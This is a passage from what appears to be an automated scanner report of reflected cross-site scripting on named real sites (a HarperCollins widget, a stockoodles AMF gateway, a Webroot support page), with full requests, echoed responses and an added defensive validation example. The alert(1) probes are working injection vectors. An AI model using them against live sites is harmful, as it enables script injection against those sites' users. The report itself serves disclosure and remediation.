GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl24aec%3balert(1)//c4608435b21&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:10 GMT
Content-Length: 38434


document.write("<font class=\"fontGlobal2nl24aec;alert(1)//c4608435b21n42default\"><div id=\"divHCWidgetHead2nl24aec;alert(1)//c4608435b21n42default\"></div>");
document.write("<div
...[SNIP]...
tBtn2nl24aec;alert(1)//c4608435b21n42default", "http://services.harpercollins.com/widgets/subscription/images/submit_dark.png", true);

//Widget variable declarations
var WidgetId2nl24aec;alert(1)//c4608435b21n42default = 99;
var SiteId2nl24aec;alert(1)//c4608435b21n42default = 2;
var ProgramType2nl24aec;alert(1)//c4608435b21n42default = "nl";
var ProgramValue2nl24aec;alert(1)//c4
...[SNIP]...
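Finding 1.113 (the jsoncallback value) and findings 1.117 and 1.121 (pt and pv spliced into identifiers) share a property the report's generic remediation text does not address: the reflected value sits in an unquoted position, so there is no string to stay inside and no output encoding helps. The only defence is to reject anything that is not an identifier before it reaches the template. The following added example, not code from the report or from either site, implements that allow-list and a JSONP response builder that uses it; the response headers and the /**/ prefix are the editor's recommendation, not the sites' observed configuration.

```javascript
// Added example, not code from the report or from the sites it lists.
// Allow-list validation for values that end up in an unquoted JavaScript
// position: the JSONP callback of finding 1.113 and the pt/pv fragments
// that the widget script of 1.117 and 1.121 splices into identifiers.

// A JSONP callback may be a dotted identifier path such as jQuery.fn or
// window.cb; each segment must be a plain ASCII identifier. A reserved-word
// check is omitted: the server only needs to refuse non-identifiers.
const IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

function isSafeCallbackName(name, maxLen = 64) {
  if (typeof name !== 'string' || name.length === 0 || name.length > maxLen) {
    return false;
  }
  return name.split('.').every((seg) => IDENT.test(seg));
}

// The widget builds names like WidgetId2<pt><pv>default, so pt and pv must
// themselves be identifier fragments: letters and digits only, bounded.
const IDENT_FRAGMENT = /^[A-Za-z0-9]{1,32}$/;
function isSafeIdentifierFragment(value) {
  return typeof value === 'string' && IDENT_FRAGMENT.test(value);
}

// JSON that is also safe to embed as JavaScript source: U+2028/U+2029 are
// legal in JSON strings but were line terminators in JS string literals
// before ES2019, and "</" is escaped so the body cannot close a <script>.
function jsonForScript(data) {
  return JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029')
    .replace(/<\//g, '<\\/');
}

// Build the JSONP response. Returns null for a rejected callback so the
// caller can answer 400 instead of reflecting the value. The leading "/**/"
// and the nosniff header are the standard hardening for JSONP endpoints:
// the attacker no longer controls the first bytes of the script body, and
// the browser will not reinterpret the response as another type.
function buildJsonpResponse(callback, data) {
  if (!isSafeCallbackName(callback)) return null;
  return {
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: '/**/' + callback + '(' + jsonForScript(data) + ');',
  };
}

// Stand-alone demonstration with the report's two callback values
// (the second is the scanner's probe) and a constructed data object.
const SAMPLE = { token: 'D0647A776FCC8CCED063917E5C8DD51A', data: '11139.3|-100.96' };
console.log(buildJsonpResponse('jQuery151023154082498513162_1315416558168', SAMPLE));
console.log(buildJsonpResponse('jQuery151023154082498513162_13154165581683f0cf<a>e90c4a69c92', SAMPLE));
console.log('pt=nl ok:', isSafeIdentifierFragment('nl'));
console.log('pt probe ok:', isSafeIdentifierFragment('nl24aec;alert(1)//c4608435b21'));
```

The same regular expression rejects the 1.117 probe, the 1.121 probe and the %0a variants of 1.118 and 1.120, because none of them is a run of letters and digits; a validator of this shape belongs at the boundary where sid, pt, pv, dn and mid are read, not in the template.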

1.118. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript rest-of-line comment. The payload f1c69%0aalert(1)//6c8b0e2d7df was submitted in the pt parameter. This input was echoed as f1c69, then a literal line break, then alert(1)//6c8b0e2d7df in the application's response; the line break terminates the comment, alert(1) runs as a statement and the trailing // comments out the remainder of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nlf1c69%0aalert(1)//6c8b0e2d7df&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:14 GMT
Content-Length: 38434


document.write("<font class=\"fontGlobal2nlf1c69
alert(1)//6c8b0e2d7dfn42default\"><div id=\"divHCWidgetHead2nlf1c69
alert(1)//6c8b0e2d7dfn42default\"></div>");
document.write("<div
...[SNIP]...
42default = "Sign me up to receive news about books that explore biography, memoir, history, politics and more.";
var strProgramText2nlf1c69
alert(1)//6c8b0e2d7dfn42default = GetProgramText2nlf1c69
alert(1)//6c8b0e2d7df
n42default("Notable Nonfiction", "nl");
var strProgramType2nlf1c69
alert(1)//6c8b0e2d7dfn42default = GetProgramType2nlf1c69
alert(1)//6c8b0e2d7dfn42default("nl");
var iCurrentState2nl
...[SNIP]...

1.119. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8a6"%3balert(1)//38558cd33d2 was submitted in the pt parameter. This input was echoed as 1f8a6";alert(1)//38558cd33d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl1f8a6"%3balert(1)//38558cd33d2&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:08 GMT
Content-Length: 38735


document.write("<font class=\"fontGlobal2nl1f8a6";alert(1)//38558cd33d2n42default\"><div id=\"divHCWidgetHead2nl1f8a6";alert(1)//38558cd33d2n42default\"></div>");
document.write("<d
...[SNIP]...

1.120. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript rest-of-line comment. The payload 69597%0aalert(1)//11e60e246fb was submitted in the pv parameter. This input was echoed as 69597, then a literal line break, then alert(1)//11e60e246fb in the application's response; the line break terminates the comment, alert(1) runs as a statement and the trailing // comments out the remainder of the original line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=3282869597%0aalert(1)//11e60e246fb&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:49 GMT
Content-Length: 39108


document.write("<font class=\"fontGlobal2at3282869597
alert(1)//11e60e246fbdefault\"><div id=\"divHCWidgetHead2at3282869597
alert(1)//11e60e246fbdefault\"></div>");
document.write("
...[SNIP]...
Id2at3282869597
alert(1)//11e60e246fbdefault = 2;
var ProgramType2at3282869597
alert(1)//11e60e246fbdefault = "at";
var ProgramValue2at3282869597
alert(1)//11e60e246fbdefault = "3282869597
alert(1)//11e60e246fb
";
var DesignName2at3282869597
alert(1)//11e60e246fbdefault = "default";
var isCoppa2at3282869597
alert(1)//11e60e246fbdefault = true;
var iCoppaMode2at3282869597
alert(1)//1
...[SNIP]...

1.121. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 49a73%3balert(1)//ca8a8f2ac10 was submitted in the pv parameter. This input was echoed as 49a73;alert(1)//ca8a8f2ac10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=3282849a73%3balert(1)//ca8a8f2ac10&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:46 GMT
Content-Length: 39108


document.write("<font class=\"fontGlobal2at3282849a73;alert(1)//ca8a8f2ac10default\"><div id=\"divHCWidgetHead2at3282849a73;alert(1)//ca8a8f2ac10default\"></div>");
document.write("
...[SNIP]...
3282849a73;alert(1)//ca8a8f2ac10default", "http://services.harpercollins.com/widgets/subscription/images/submit_dark.png", true);

//Widget variable declarations
var WidgetId2at3282849a73;alert(1)//ca8a8f2ac10default = 69;
var SiteId2at3282849a73;alert(1)//ca8a8f2ac10default = 2;
var ProgramType2at3282849a73;alert(1)//ca8a8f2ac10default = "at";
var ProgramValue2at3282849a73;alert(
...[SNIP]...

1.122. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f251e"%3balert(1)//83887f6d667 was submitted in the pv parameter. This input was echoed as f251e";alert(1)//83887f6d667 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=32828f251e"%3balert(1)//83887f6d667&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:44 GMT
Content-Length: 39411


document.write("<font class=\"fontGlobal2at32828f251e";alert(1)//83887f6d667default\"><div id=\"divHCWidgetHead2at32828f251e";alert(1)//83887f6d667default\"></div>");
document.write
...[SNIP]...

1.123. http://stockoodles.com/v1/market/amfphp/gateway.php [2nd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 8850a<script>alert(1)</script>4dcd5ba057e was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 244
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929

........null../1.....    ..
..Mflex.messaging.messages.CommandMessage.timestamp.headers.operation    body.correlationId.messageId.timeToLive.clientId.destination.........
#.%DSMessagingVersion    DSId....nil..
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:32:50 GMT
Expires: Wed, 7 Sep 2011 07:32:50 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 393

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../1/onResult..null...+.
.Uflex.messaging.messages.AcknowledgeMessage.messageId.I3724870C-0CFD-2E48-533F-0000359F3190.clientId.I7
...[SNIP]...
<....headers
....correlationId...2B8DEDAA-17C8-506A-1AEE-44F2D3FE8A9B8850a<script>alert(1)</script>4dcd5ba057e.

1.124. http://stockoodles.com/v1/market/amfphp/gateway.php [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 58f06<script>alert(1)</script>98b93e06103 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 277
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929; PHPSESSID=gio9fstslhuds6gf6pfqns7ie1

........null../2.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation    bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:33:02 GMT
Expires: Wed, 7 Sep 2011 07:33:02 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 599

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onStatus..null.....
.Iflex.messaging.messages.ErrorMessage.correlationId.I61A9427B-C408-65D3-7F57-44F2D2FA737D.faultCode.5AM
...[SNIP]...
/v1/market/amfphp/core/shared/app/BasicActions.php on line 25.faultString..AThe classpath folder {/mnt/stor10-wc2-dfw1/577993/www.stockoodles.com/web/content/v1/market/amfphp/services/BasicUtilsService58f06<script>alert(1)</script>98b93e06103.php} does not exist. You probably misplaced your service..

1.125. http://stockoodles.com/v1/market/amfphp/gateway.php [4th AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 4th AMF string parameter is copied into the HTML document as plain text between tags. The payload c8ab3<script>alert(1)</script>ed4afefc687 was submitted in the 4th AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 277
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929; PHPSESSID=gio9fstslhuds6gf6pfqns7ie1

........null../2.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation    bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:33:05 GMT
Expires: Wed, 7 Sep 2011 07:33:05 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 420

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onResult..null...F.
.Uflex.messaging.messages.AcknowledgeMessage.messageId.I57941307-BCC9-8AA8-03E1-0000578D6A4F.clientId.I28D3B466-E8AF-C069-D271-000048B2D7DA.destination.    body.5gio9fstslhuds6gf6pfqns7ie1.timeToLive...timestamp.B>.cBd...headers
....correlationId...61A9427B-C408-65D3-7F57-44F2D2FA737Dc8ab3<script>alert(1)</script>ed4afefc687.

1.126. http://support.webroot.com/ci/redirect/enduser/enduser/acct_login.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.webroot.com
Path:   /ci/redirect/enduser/enduser/acct_login.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f29a7<script>alert(1)</script>178e29b8bea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ci/redirect/enduserf29a7<script>alert(1)</script>178e29b8bea/enduser/acct_login.php?p_sid=shNEGuDk HTTP/1.1
Host: support.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.5.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162; cp_session=aUBPqe9ex_RwrreoW72q1%7E9AMDARLWu9zbtsVr7pCBPxxD5ab3V0slezCoLOw052%7EmWPNc9rCDyOkP3CuQ%7Ees5jKBr2kRKs6EyOHKSzT5nRTvn6yr26qXu0tMKZL1uczgPBF88B1Ielnm0Dhi1S9Jgrsw1VYHK0BrD; s_nr=1315418110011; s_lv=1315418110013; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:57:23 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU3LlSQbVPBnJc%7E7ZfpCiJWpNGC3u8jkjZ7gr8OVcMPNlJPXEYUJdGt6uiM4Vymz_3AXDp8TuYz7mS4jeO1qVp1912CON2_b13AvH8rnNorHq1Oi_HjkTfFKJY4qcpR2u7QZBMxyINNi%7EAlgydl3M9i9dg7doyyaD7Tp2ry0iDXDhAdKxg8bpckw4IT2m5uavGRXaWH_%7Ewjk0%21; path=/; httponly
RNT-Time: D=113219 t=1315400243095244
RNT-Machine: 04
Vary: Accept-Encoding
Content-Length: 18151
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
<p>Page /ci/redirect/enduserf29a7<script>alert(1)</script>178e29b8bea/enduser/acct_login.php?p_sid=shNEGuDk not found.</p>
...[SNIP]...

1.127. http://support.webroot.com/ci/redirect/enduser/enduser/ask.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.webroot.com
